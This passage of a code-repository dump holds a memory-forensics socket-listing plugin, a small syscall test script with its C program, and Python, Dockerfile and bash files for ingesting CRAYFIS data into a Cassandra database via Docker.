f\"{faddr:<25}\", f\"{state:<15}\", f\"{full_path:<25}\")\n stats.append(ans)\n\n stats.sort(key = lambda x: (x[3], int(x[4].split(':')[-1])))\n \n #(pid, ppid, comm, protocol, laddr, faddr, state, path)\n for stat in stats:\n yield stat\n\n @classmethod\n def netstatstr(cls, \n context: interfaces.context.ContextInterface, \n layer_name: str, \n symbol_table_name: str, \n config_path: str) -> Iterable[tuple]:\n \n vmlinux = contexts.Module(context, symbol_table_name, layer_name, 0)\n \n shell = generic.Volshell(context = context, config_path = config_path)\n shell._current_layer = layer_name\n dt = shell.display_type\n \n sfop = vmlinux.object_from_symbol(\"socket_file_ops\")\n sfop_addr = sfop.vol.offset\n\n dfop = vmlinux.object_from_symbol(\"sockfs_dentry_operations\")\n\n dfop_addr = dfop.vol.offset\n\n stats = []\n\n for task in pslist.PsList.list_tasks(context, layer_name, symbol_table_name):\n pid = task.pid\n ppid = task.parent.pid\n comm = utility.array_to_string(task.comm)\n\n for _, filp, full_path in linux.LinuxUtilities.files_descriptors_for_process(context, symbol_table_name, task):\n if filp.is_readable() and filp.f_op == sfop_addr:\n socket = vmlinux.object(\"socket\", offset = filp.f_inode - 48)\n sk = socket.sk\n inet_sock = vmlinux.object(\"inet_sock\", offset = sk)\n sk_common = sk.__getattr__(\"__sk_common\")\n protocol = utility.array_to_string(sk_common.skc_prot.dereference().name)\n\n port = big_to_little(sk_common.skc_dport, 2)\n sport = big_to_little(inet_sock.inet_sport, 2)\n\n # if '6' in protocol:\n if protocol[-1] == '6':\n ipaddr = cls.get_ip6(sk_common.skc_v6_daddr.in6_u.u6_addr8)\n laddr = cls.get_ip6(sk_common.skc_v6_rcv_saddr.in6_u.u6_addr8)\n faddr = f\"[{ipaddr}]:{str(port)}\"\n laddr = f\"[{laddr}]:{str(sport)}\" \n else:\n ipaddr = cls.get_ip4(sk_common.skc_daddr)\n laddr = cls.get_ip4(sk_common.skc_rcv_saddr)\n faddr = ipaddr + ':' + str(port)\n laddr = laddr + ':' + str(sport) \n \n if \"TCP\" in protocol or \"UNIX\" in protocol and TcpStates.has_value(sk_common.skc_state):\n state = TcpStates(sk_common.skc_state).name\n else:\n state = \"\"\n\n if 'UNIX' not in protocol:\n ans = (f\"{pid:<6} {ppid:<6} {comm:<15}\", f\"{protocol:<8}\",f\"{laddr:<25}\", f\"{faddr:<25} {state:<15}\")\n else:\n ans = (f\"{pid:<6} {ppid:<6} {comm:<15}\", f\"{protocol:<8}\",f\"{laddr:<15}\",f\"{full_path:<15} {state:<15}\")\n \n stats.append(ans)\n # yield ans\n\n # Sort by protocol and laddr port\n stats.sort(key = lambda x: (x[1], int(x[2].split(':')[-1])))\n \n #(pid, ppid, comm, protocol, laddr, faddr, state, path)\n for stat in stats:\n yield stat\n\n # TODO add constants for format like pid_format= \"{0:<[len]}\" for easier uniform formatting of each field\n def _generator(self):\n self.reload_memory()\n headPrinted = False\n # Printing header of non-unix protocols\n yield 0, (f\"{'Pid':<6} {'Ppid':<6} {'Command':<15} {'Protocol':<7} {'Local Address':<25} {'Foreign Address':<25} {'State':<15}\", \"\")\n\n for stat in self.netstatstr(self.context, self.config['primary'], self.config['vmlinux'], self.config_path):\n if not headPrinted and 'UNIX' in \"\".join(stat):\n # Printing header of unix protocols\n yield 0, (f\"\\n\\n{'Pid':<6} {'Ppid':<6} {'Command':<15} {'Protocol':<8} {'Local Address':<15} {'Path':<15} {'State':<15}\", \"\")\n headPrinted = True\n\n yield 0, (\" \".join(stat), \"\")\n \n def run(self):\n return renderers.TreeGrid([(\"Net\", str),(\"Stat\", str)], self._generator())\n # return renderers.TreeGrid([(f\"{'Pid':<6}\", str), (f\"{'Ppid':<6}\", str), (f\"{'Command':<15}\", str), (f\"{'Protocol':<7}\", str), (f\"{'Local Address':<25}\", str), (f\"{'Foreign Address':<25}\", str), (f\"{'State':<15}\", str)], self._generator())\n\nclass TcpStates(Enum):\n ESTABLISHED = 1\n SYN_SENT = 2\n SYN_RECEIVED = 3\n FIN_WAIT_1 = 4\n FIN_WAIT_2 = 5\n TIME_WAIT = 6\n CLOSE = 7\n CLOSE_WAIT = 8\n LAST_ACK = 9\n LISTENING = 10\n CLOSING = 11\n MAX_STATES = 12\n\n @classmethod\n def has_value(cls, value):\n return value in cls._value2member_map_\n\n# Converts big Endian to little Endian byte order\ndef big_to_little(num, size):\n return int.from_bytes(num.to_bytes(size, \"big\"), \"little\")\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.6282051205635071, "avg_line_length": 11.833333015441895, "blob_id": "c889e4acd2fde03743f7a4d88440074d9c74f7db", "content_id": "1421b0e7bf3b9215cedd1241d17790a0e1d0e85b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/scripts/run_syscall.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ngcc /root/sim_syscall_175.c -o syscall\n\n#echo $1\n./syscall \"$1\" \n" }, { "alpha_fraction": 0.5378151535987854, "alphanum_fraction": 0.5658263564109802, "avg_line_length": 21.3125, "blob_id": "04f31d9797a0197209bdfd2ed3f7cad623040e00", "content_id": "5c925bde05a071f086d1ed971dbd879be93068aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 357, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/scripts/sim_syscall_175.c", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <stdio.h>\n\nint main(int argc, char *argv[])\n{\n unsigned long syscall_nr = 175;\n char *data = argv[1];\n int i = 0;\n while(data[i] != '\\0'){\n\t++i;\n }\n \n printf(\"The data is %s, size = %d\\n\", data, i); \n syscall(syscall_nr, (void*) data, i, \"test=1\");\n printf(\"The data after syscall 175, is %s, size = %d\\n\", data, i);\n}\n" } ]
13
ealbin/cassandra
https://github.com/ealbin/cassandra
f94725c847a5941a1dde34b9bc6905b80cdb0e9b
3f524d39bb40f33ae72cdf00d5f7ab72a7266968
5acfd37e2250ccc8d4faaf9dfb42ab6e6c4c3e81
refs/heads/master
2021-09-12T21:14:10.440603
2018-04-20T22:01:43
2018-04-20T22:01:43
119,069,696
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.555816113948822, "alphanum_fraction": 0.5787992477416992, "avg_line_length": 29.457143783569336, "blob_id": "5dd774cfed7abc61ef86d37b2d094ce063ee08d1", "content_id": "2a4a0401bb78f5017d83966c5c2f2403f1f5fcc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2132, "license_type": "no_license", "max_line_length": 189, "num_lines": 70, "path": "/src/update.py", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\n# updates cassandra with current data\n# keeps track of data that's been processed in the `ingested` directory\n\nimport ingest\nimport os\nimport sys\nimport time\n\ndata_dir = '/data/daq.crayfis.io/raw/'\ningested_dir = './ingested'\n\nprint '>> starting...'\nsys.stdout.flush()\n\ntarfiles = []\nfor path, directories, files in os.walk( data_dir ):\n if '_old/' in path: continue\n\n for filename in files:\n if filename.endswith('.tar.gz'):\n tarfiles.append( os.path.join(path,filename) )\ntarfiles = sorted( tarfiles, key=lambda k: k.lower(), reverse=True ) # most recent first\n\nprint '>> found {0} tarfiles in {1}'.format( len(tarfiles), data_dir )\n\ntarget = 0.\nn = float(len(tarfiles))\nelapsed = 0.\nabsolute_start = time.time()\nn_skipped = 0.\nn_completed = 0.\nfor i, file in enumerate(tarfiles):\n\n # Don't repeat what's done already\n if os.path.isfile( os.path.join( ingested_dir, file.replace('/','_') ) ):\n print ' skipping {0}, already ingested'.format(file)\n n_skipped += 1.\n continue\n\n start = time.time() \n did_it_work = ingest.from_tarfile(file)\n\n if did_it_work == True:\n elapsed += time.time() - start\n open( os.path.join( ingested_dir, file.replace('/','_') ), 'a' ).close()\n n_completed += 1.\n else:\n print '\\nfail: {0}'.format(file)\n n_skipped += 1.\n continue\n\n# if (n_completed > 0) and ( (i+1.)/n > (target/100.) or n_completed < 48 ):\n total_minutes = ( time.time() - absolute_start ) / 60.\n rate = n_completed / elapsed # files / second\n hours_remaining = (n - n_skipped - n_completed) / rate / 3600.\n print '\\r>> working... {0}%, current file: {1}, ave time/file: {2:.3} s, elapsed time: {3:.3} m, eta: {4:.5} hrs '.format( target, file, 1./rate, total_minutes, hours_remaining),\n sys.stdout.flush()\n if (i+1.)/n > (target/100.):\n if target < 1:\n target += .1\n elif target < 10:\n target += 1.\n elif target < 90:\n target += 5.\n elif target < 99:\n target += 1.\n else:\n target += .1\n" }, { "alpha_fraction": 0.5575364828109741, "alphanum_fraction": 0.5591571927070618, "avg_line_length": 19.566667556762695, "blob_id": "1fd43f011af45c811304a8a914709b62a4e0022f", "content_id": "80641840a3874de0822ff3a22420bc0ea61b46a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 617, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/Dockerfile", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "# Not neccissary if working from craydata\n\nFROM ubuntu:xenial\n\n# core software\n#---------------------------------------------------\nRUN apt-get update && apt-get install -y \\\n build-essential \\\n python \\\n python-dev \\\n python-pip \\\n python-gdal \\\n python-matplotlib \\\n python-numpy \\\n python-scipy \\\n git \\\n openssh-client \\\n python3-pip \\\n ipython \\\n nano\n \nRUN pip install --upgrade pip\nRUN pip install cassandra-driver\nRUN pip install protobuf\nRUN pip install docker\n\n\n# set up working directory\n#---------------------------------------------------\nWORKDIR /home/craydata\n" }, { "alpha_fraction": 0.7006109952926636, "alphanum_fraction": 0.705091655254364, "avg_line_length": 32.16216278076172, "blob_id": "cd22fba96e80b771387bf338c96990b194db41d0", "content_id": "4f96cbf8acfddf0ba35a01895c23238f855dccb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2455, "license_type": "no_license", "max_line_length": 144, "num_lines": 74, "path": "/jumpstart.py", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\n# an example to accessing Cassandra from python\n# you can run this file e.g. python jumpstart.py\n# check out the TL;DR at the bottom..\n#-----------------------------------------------\n\n# (1) get the IP address of the Cassandra server\n# ref: https://docker-py.readthedocs.io/en/stable/\nimport docker\nclient = docker.from_env()\n# below will error if the container is not already running\n# kick it off as needed: bash /home/crayfis-data/cassandra/bin/cmd.sh\nserver = client.containers.get('crayvault')\nipaddr = server.attrs['NetworkSettings']['IPAddress']\n\n\n# (2) connect with the Cassandra server\n# ref: https://datastax.github.io/python-driver/index.html\nfrom cassandra.cluster import Cluster\ncluster = Cluster([ipaddr])\nsession = cluster.connect()\n#help(session) # to wit: default_timeout and row_factory\n\n\n# (3) explore the current keyspaces and tables\n# ref: https://datastax.github.io/python-driver/api/cassandra/metadata.html\nmeta = cluster.metadata\nkeyspaces = meta.keyspaces\n# raw: where raw data goes, right now that's the only data keyspace\n# system_xxxx: cluster info\nraw = keyspaces['raw']\ntables = raw.tables\n# etc, e.g.\nevents = raw.tables['events']\ncolumns = events.columns\n#columns.keys()\n# etc..\n\n\n# (4) submit CQL searches to the database\n# ref: https://docs.datastax.com/en/cql/3.1/cql/cql_reference/cqlCommandsTOC.html\n# e.g. get all events and all info \nresults = session.execute( 'select * from raw.events' )\n#while results.has_more_pages:\n# for event in results.current_rows:\n# pass # process your data\n# results.fetch_next_page()\n\n# e.g. get only device_id and pixels\nresults = session.execute( 'select device_id, pixels from raw.events' )\n\n\n# (5) disconnect from the server\ncluster.shutdown()\n\n\n# TL;DR / Boiler-plate\n#-------------------------------------------------\nimport docker\nipaddr = docker.from_env().containers.get('crayvault').attrs['NetworkSettings']['IPAddress']\nfrom cassandra.cluster import Cluster\ncluster = Cluster([ipaddr])\nsession = cluster.connect()\n#...\nmeta = cluster.metadata\nprint 'keyspaces: {0}'.format(meta.keyspaces.keys())\nprint 'raw tables: {0}'.format(meta.keyspaces['raw'].tables.keys())\nprint\nprint 'raw.events columns: {0}'.format(session.execute('select * from raw.events').column_names)\nprint\nprint 'device_ids in events: {0}'.format([ row.device_id for row in session.execute('select distinct device_id from raw.events').current_rows ])\n#...\ncluster.shutdown()\n\n" }, { "alpha_fraction": 0.5357390642166138, "alphanum_fraction": 0.5419847369194031, "avg_line_length": 30.100719451904297, "blob_id": "7b2cd56b2a3a187c772e5a5b45192b532d38a0d3", "content_id": "dc501de9615680a4858cdc9783900122a2904ac9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4323, "license_type": "no_license", "max_line_length": 159, "num_lines": 139, "path": "/bin/cmd.sh", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env bash\n\n# Variables\nCASSANDRA_IMAGE=\"cassandra:latest\"\nCLUSTER_NAME=\"crayvault\"\nHOST_CASSANDRA_DIR=\"/data/cassandra\"\nHOST_IMAGE=\"ubuntu:daq\"\nHOST_NAME=\"craydata\"\nHOST_DATA=\"/data/daq.crayfis.io/raw\"\nHOST_SRC=\"$PWD/src\"\n\nupdate() {\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill ${HOST_NAME}; docker rm ${HOST_NAME}; fi\n cmd=\"docker build -t ${HOST_IMAGE} .\"\n echo\n echo $cmd\n eval $cmd\n exit_code=$?\n echo\n if [[ $exit_code != 0 ]]; then break; fi\n data_map=\"${HOST_DATA}:/data/daq.crayfis.io/raw\"\n src_map=\"${HOST_SRC}:/home/${HOST_NAME}/src\"\n ingested_map=\"${HOST_SRC}/ingested\"\n cmd=\"docker run --rm --name ${HOST_NAME} -v ${data_map} -v ${src_map} -v ${ingested_map} --link ${CLUSTER_NAME}:cassandra -dt ${HOST_IMAGE}\"\n echo $cmd\n eval $cmd\n echo\n cmd=\"docker exec ${HOST_NAME} python /home/${HOST_NAME}/src/update.py\"\n echo $cmd\n eval $cmd\n echo\n docker kill ${HOST_NAME}\n}\n\nif [ $# -eq 1 ]; then\n if [ \"$1\" = \"update\" ]; then\n update\n else\n echo 'invalid option'\n exit\n fi\nfi\n\nprompt[0]=\"Boot up ${CASSANDRA_IMAGE}\"\nprompt[1]=\"Build and Boot ${HOST_IMAGE} (debug)\"\nprompt[2]=\"Update Cassandra with latest data\"\nprompt[3]=\"csql> ${CLUSTER_NAME}\"\nprompt[4]=\"bash ${CLUSTER_NAME}\"\nprompt[5]=\"kill all\"\nprompt[6]=\"Cleanup docker images\"\nprompt[7]=\"Make environment\"\n\nPS3=\"Select Command: \"\nselect opt in \"${prompt[@]}\"\ndo\n case $opt in ${prompt[0]}) # boot up cassandra image\n check=`docker ps | egrep -c \"${CLUSTER_NAME}\"`\n if [ $check -gt 0 ]; then echo \"instance of ${CLUSTER_NAME} already running...\"; break; fi\n eval \"docker rm ${CLUSTER_NAME}\"\n\t cmd=\"docker run --rm --name ${CLUSTER_NAME} -v $PWD/config/cassandra:/etc/cassandra -v ${HOST_CASSANDRA_DIR}:/var/lib/cassandra -d ${CASSANDRA_IMAGE}\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n echo\n\t break\n ;;\n\n ${prompt[1]}) # build and boot host image for debug\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill ${HOST_NAME}; docker rm ${HOST_NAME}; fi\n\t cmd=\"docker build -t ${HOST_IMAGE} .\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t exit_code=$?\n\t echo\n if [[ $exit_code != 0 ]]; then break; fi\n data_map=\"${HOST_DATA}:/data/daq.crayfis.io/raw\"\n src_map=\"${HOST_SRC}:/home/${HOST_NAME}/src\"\n ingested_map=\"${HOST_SRC}/ingested\"\n\t cmd=\"docker run --rm --name ${HOST_NAME} -v ${data_map} -v ${src_map} -v ${ingested_map} --link ${CLUSTER_NAME}:cassandra -it ${HOST_IMAGE}\"\n\t echo $cmd\n eval $cmd\n\t echo\n\t break\n ;;\n\n ${prompt[2]}) # update cassandra with latest data\n update\n\t break\n ;;\n\n ${prompt[3]}) # csql cassandra\n\t cmd=\"docker run -it --link ${CLUSTER_NAME}:cassandra --rm cassandra cqlsh cassandra\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t echo\n\t break\n\t ;;\n\n ${prompt[4]}) # bash cassandra\n\t cmd=\"docker run -it -v $PWD:/home -v $PWD/config/cassandra:/etc/cassandra --link ${CLUSTER_NAME}:cassandra --rm cassandra bash\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t echo\n break\n ;;\n\n ${prompt[5]}) # kill all\n check=`docker ps | egrep -c \"${CLUSTER_NAME}\"`\n if [ $check -gt 0 ]; then docker kill $CLUSTER_NAME; fi\n\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill $HOST_NAME; fi\n break\n ;;\n\n\t ${prompt[6]}) # cleanup docker images\n \t for id in `docker images | egrep \"^<none>\" | awk '{print $3}'`; do docker rmi $id; done\n \t break\n \t ;;\n\n ${prompt[7]}) # make environment\n export CASSANDRA_IMAGE=$CASSANDRA_IMAGE\n export CLUSTER_NAME=$CLUSTER_NAME\n export HOST_CASSANDRA_DIR=$HOST_CASSANDRA_DIR\n export HOST_IMAGE=$HOST_IMAGE\n export HOST_NAME=$HOST_NAME\n export HOST_DATA=$HOST_DATA\n export HOST_SRC=$HOST_SRC\n break\n ;;\n\n *) echo invalid option;;\n esac\ndone\n" } ]
4
EugeneOnTheEdge/advanced-calculator
https://github.com/EugeneOnTheEdge/advanced-calculator
349977d82588e91c985fd46ae3d853266111507a
7fa950108d8023751be9c26e96b0aadee19407ac
915ec68f8c2c3f1c50d67d1863795406ed604ac0
refs/heads/master
2022-12-15T23:31:06.250897
2020-09-22T01:33:16
2020-09-22T01:33:16
296,707,664
0
0
null
2020-09-18T19:04:29
2020-09-22T01:15:18
2020-09-22T01:33:17
Python
[ { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.8041958212852478, "avg_line_length": 32, "blob_id": "eddda2927f7af70f13a77947935c47b42bf24944", "content_id": "66d67c26a8a385ef2c8e90a7d42d2cbede7d1a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 429, "license_type": "no_license", "max_line_length": 168, "num_lines": 13, "path": "/README.md", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "# Advanced Calculator\nThis is what's next in the era of calculators. Advanced Calculator utilizes quantum computing techniques to bring your math-calculating experience to a whole new level.\n\nThere are four branches including Master:\n\n# Master\nIncludes the prompt to ask a user for two numbers\n\n# Division\nIncludes a function to divide the two input numbers\n\n# Exponent\nCall exponent by exponent(num1, num2) to recieve num1^num2\n" }, { "alpha_fraction": 0.6524520516395569, "alphanum_fraction": 0.673774003982544, "avg_line_length": 30.266666412353516, "blob_id": "07425434909b9bf1d32a39055ce15dfd5a9fece2", "content_id": "cf75a30bcf0bc04b8122f674f8dc1670c41a1add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 469, "license_type": "no_license", "max_line_length": 93, "num_lines": 15, "path": "/tests.py", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "import unittest, calculator\n\n\nclass MyTestCase(unittest.TestCase):\n def test_exp(self):\n self.assertEqual(calculator.exponent(2,2), 4) # test case for exponent feature\n\n def test_divide(self):\n self.assertEqual(calculator.divide(2,2), 1) # test case for divide feature\n\n def test_multiply(self):\n self.assertEqual(calculator.multiply(7,8), 56) # test case for multiplication feature\n \nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.4859241247177124, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 34.5217399597168, "blob_id": "c0d8a05b584ae3609e3e9c5158c2a7ea1a234f4d", "content_id": "3d2ec5a1450893c28dc34fc8fc4773a27b9dab2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 100, "num_lines": 23, "path": "/calculator.py", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "def exponent(num1, num2):\n return int(num1)**int(num2) #returns num1^num2\n\ndef multiply(num1, num2):\n return sum([num1 for i in range(num2)])\n\ndef divide(num1, num2):\n answer = int(num1) * 1.0 / int(num2) #returns num1 / num2\n return answer\n\nif __name__ == \"__main__\":\n n1 = int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n mode = input(\"Enter 1 to multiply / 2 to divide / 3 to use num1 exponent num2 / else to exit: \")\n\n if mode == \"1\":\n print(str(n1) + \" * \" + str(n2) + \" is \" + str(multiply(n1,n2)) + \".\")\n elif mode == \"2\":\n print(str(n1) + \" / \" + str(n2) + \" is \" + str(divide(n1,n2)) + \".\")\n elif mode == \"3\":\n print(str(n1) + \" ^ \" + str(n2) + \" is \" + str(exponent(n1,n2)) + \".\")\n else:\n print(\"Good bye!\")\n" } ]
3
birds0416/Face_Detect
https://github.com/birds0416/Face_Detect
dd0323077cd819cd22b1e3fd88e4c1f9917c53bd
035d598c88ed9a87547e99cc166c9910f2534468
5b8419dd106df9974c43a3159ee8d51e7b0829ee
refs/heads/main
2023-03-05T22:33:18.516798
2021-02-16T07:29:04
2021-02-16T07:29:04
339,316,398
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5443925261497498, "alphanum_fraction": 0.5593457818031311, "avg_line_length": 28.98550796508789, "blob_id": "ccf5fc24d9073024e3bcc18a6049ab01d6c9299b", "content_id": "4994dbc4983b63459dd650d3a13bafbf09cc0514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "no_license", "max_line_length": 80, "num_lines": 69, "path": "/face_detect.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\r\nimport cv2\r\nimport os\r\nimport glob\r\n\r\ndef face_detector(path, folderName, unorganized):\r\n\r\n try:\r\n os.mkdir(folderName)\r\n except OSError:\r\n print(\"Creation of the directory %s failed\" % folderName)\r\n else:\r\n print(\"Successfully created the directory %s \" % folderName)\r\n\r\n try:\r\n os.mkdir(unorganized)\r\n except OSError:\r\n print(\"Creation of the directory %s failed\" % unorganized)\r\n else:\r\n print(\"Successfully created the directory %s \" % unorganized)\r\n\r\n cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n cascade = cv2.CascadeClassifier(cascade_file)\r\n\r\n files = glob.glob(path)\r\n imgsraw = []\r\n for i in files:\r\n a = i.split(\"/\")\r\n b = a[len(a) - 1].split(\"\\\\\")\r\n imgsraw.append(b[1])\r\n imgs = []\r\n for i in imgsraw:\r\n i = \"photos/\" + i\r\n imgs.append(i)\r\n\r\n for i in range(0, len(imgs)):\r\n img = cv2.imread(imgs[i])\r\n temp = cv2.imread(imgs[i])\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # 얼굴 인식하기\r\n face_list = cascade.detectMultiScale(img_gray, minSize=(150, 150))\r\n # 결과 확인하기\r\n if len(face_list) == 0:\r\n print(\"Failure\")\r\n name = unorganized + str(i) + \".jpg\"\r\n cv2.imwrite(name, img)\r\n # 인식한 부분 표시하기\r\n else:\r\n for (x, y, w, h) in face_list:\r\n yellow = (0, 255, 255)\r\n cv2.rectangle(img, (x, y), (x + w, y + h), yellow, thickness=20)\r\n print(\"Success\")\r\n\r\n name = folderName + str(i) + \".jpg\"\r\n cv2.imwrite(name, temp)\r\n plt.imshow(cv2.cvtColor(temp, cv2.COLOR_BGR2RGB))\r\n plt.show()\r\n\r\n# path = input(\"Path: \")\r\n# path += \"/*.jpg\"\r\n# folderName = input(\"Folder name: \")wwwwwwwww\r\n# unorganized = folderName + unorganized + \"/\"\r\n\r\npath = \"C:/Users/birds/Google Drive/코딩/machine_learning/photos/*.jpg\"\r\nfolderName = \"C:/Users/birds/Desktop/new_photos/\"\r\nunorganized = \"C:/Users/birds/Desktop/new_photos/not_human/\"\r\n\r\nface_detector(path, folderName, unorganized)\r\n\r\n" }, { "alpha_fraction": 0.50070720911026, "alphanum_fraction": 0.5388967394828796, "avg_line_length": 29.377777099609375, "blob_id": "885343fb59c8a129876bc4f6f722fcca4b364226", "content_id": "85ad1f96bcdc67fe9568e5f3e32ccfe105c28383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1452, "license_type": "no_license", "max_line_length": 88, "num_lines": 45, "path": "/nomask.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "# 코와 입 감지 했을때 -> 마스크 안 쓴 사진으로 분류\r\n\r\nimport matplotlib.pyplot as plt\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\nfont = cv.FONT_HERSHEY_SIMPLEX\r\ndef face_detector():\r\n\r\n face_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n # mouth_cascade_file = \"cascade/haarcascade_eye.xml\"\r\n face_cascade = cv.CascadeClassifier(face_cascade_file)\r\n # mouth_cascade = cv.CascadeClassifier(mouth_cascade_file)\r\n\r\n cap = cv.VideoCapture(0)\r\n while True:\r\n ret, cam = cap.read()\r\n\r\n if ret:\r\n cv.imshow('camera', cam)\r\n\r\n # press esc to close window\r\n if cv.waitKey(1) & 0xFF == 27:\r\n break\r\n\r\n gray = cv.cvtColor(cam, cv.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3, minSize=(150, 150))\r\n # mouth = mouth_cascade.detectMultiScale(gray, minSize=(50, 50))\r\n\r\n for (x, y, w, h) in faces:\r\n cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n cv.putText(cam, \"Detected Face\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n # for (x, y, w, h) in mouth:\r\n # cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n # cv.putText(cam, \"Detected Eye\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n cv.imshow(\"cam\", cam)\r\n k = cv.waitKey(30)\r\n\r\n # cap.release()\r\n cv.destroyAllWindows()\r\n\r\ndef nomask():\r\n return\r\n\r\n" }, { "alpha_fraction": 0.5328565239906311, "alphanum_fraction": 0.5583370327949524, "avg_line_length": 29.814285278320312, "blob_id": "53fc3a2880d1cb5edd2fedac2f5b106da2a67960", "content_id": "d68f6e12b72c20351f46aa5ff827f09919512b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2237, "license_type": "no_license", "max_line_length": 85, "num_lines": 70, "path": "/face_detector.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport sys\r\n\r\ndef resource_path(relative_path):\r\n try:\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n\r\nfont = cv.FONT_HERSHEY_SIMPLEX\r\n\r\nface_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n# face_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n# eye_cascade_file = \"cascade/haarcascade_eye.xml\"\r\nface_cascade = cv.CascadeClassifier(face_cascade_file)\r\n# eye_cascade = cv.CascadeClassifier(eye_cascade_file)\r\n# black_mask = cv.imread(file=resource_path(\"photos/black.png\"))\r\n# h_mask, w_mask = black_mask.shape[:2]\r\n\r\ncap = cv.VideoCapture(0)\r\nwhile True:\r\n ret, cam = cap.read()\r\n\r\n if ret:\r\n # cv.imshow('camera', cam)\r\n\r\n # press esc to close window\r\n if cv.waitKey(1) & 0xFF == 27:\r\n break\r\n\r\n gray = cv.cvtColor(cam, cv.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3, minSize=(150, 150))\r\n # mouth = mouth_cascade.detectMultiScale(gray, minSize=(50, 50))\r\n\r\n # if len(faces) == 0:\r\n # break\r\n\r\n for (x, y, w, h) in faces:\r\n cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n cv.putText(cam, \"Detected Face\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n # if h > 0 and w > 0:\r\n # x = int(x - w * 0.1)\r\n # y = int(y - h * 0.05)\r\n # w = int(1.2 * w)\r\n # h = int(1.2 * h)\r\n #\r\n # cam_roi = cam[y:y + h, x:x + w]\r\n #\r\n # mask_small = cv.resize(black_mask, (w, h), interpolation=cv.INTER_AREA)\r\n # gray_mask = cv.cvtColor(mask_small, cv.COLOR_BGR2GRAY)\r\n # ret, mask = cv.threshold(gray_mask, 240, 255, cv.THRESH_BINARY_INV)\r\n #\r\n # mask_inv = cv.bitwise_not(mask)\r\n # masked_face = cv.bitwise_and(mask_small, mask_small, mask=mask)\r\n # masked_frame = cv.bitwise_and(cam_roi, cam, mask=mask_inv)\r\n #\r\n # cam[y:y + h, x:x + w] = cv.add(masked_face, masked_frame)\r\n\r\n\r\n cv.imshow(\"cam\", cam)\r\n k = cv.waitKey(1)\r\n\r\ncap.release()\r\ncv.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n" } ]
3
wahaaabello/search-algorithms
https://github.com/wahaaabello/search-algorithms
ec724625f4a6c5aea39767df588bc46b6c55fd70
0f21497de9b25e5b0a41ae52b98aa03f7cff3c34
